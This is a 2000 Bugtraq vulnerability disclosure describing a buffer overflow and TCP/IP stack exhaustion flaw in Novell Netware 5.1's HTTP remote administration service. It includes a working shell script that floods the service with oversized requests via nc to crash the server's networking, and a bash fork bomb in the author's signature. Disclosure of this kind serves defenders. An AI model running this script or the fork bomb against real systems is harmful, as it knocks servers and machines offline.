Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
Date: Tue, 18 Apr 2000 14:29:27 +0200
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...
Hi again. Another overflow and TCP/IP stack flaw.
Affected: virtually any system running on the top of Netware system with
http remote administration (including web caching solutions,
BorderManager firewall and so on)...
There's an buffer overflow in remote (http, usually on port 8008 or so)
administration protocol for tcp-enabled Netware servers - it might be
exploited by sending request like that:
GET /
AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)
Connection won't be dropped (that's Netware TCP/IP stack problem or
_feature_), but you'll get an error message on console, sometimes with
stack dump (yes, lovely: 41 41 41 41... ;) There are two problems with it:
1. Of course, overflow, allowing attacker to execute arbitraty code on
server,
2. Problem with TCP/IP stack; there's no automatic clean-up in case of
application crash. By connecting, sending evil request, disconnecting
and connecting again for some time (usually few thousand times is
enough), whole TCP/IP stack will be fscked up, causing death of
TCP networking (first, server starts to refuse or immediately drops
any connection, then stops responding network requests), and,
eventually, whole server dies.
There's simple script, which, left for some time, should kill Netware
TCP/IP. Please change $SERVER and $PORT for testing purposes.
-- kill_nwtcp.c --
#!/bin/sh
SERVER=127.0.0.1
PORT=8008
WAIT=3
DUZOA=`perl -e '{print "A"x4093}'`
MAX=30
while :; do
ILE=0
while [ $ILE -lt $MAX ]; do
(
(
echo "GET /"
echo $DUZOA
echo
) | nc $SERVER $PORT &
sleep $WAIT
kill -9 $!
) &>/dev/null &
ILE=$[ILE+1]
done
sleep $WAIT
done
-- EOF --
For me, Novell sells pretty good IPX solutions for local networks, but it
isn't the best idea to use it as firewall, as system architecture based on
DOS isn't good for Real Networking :(
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
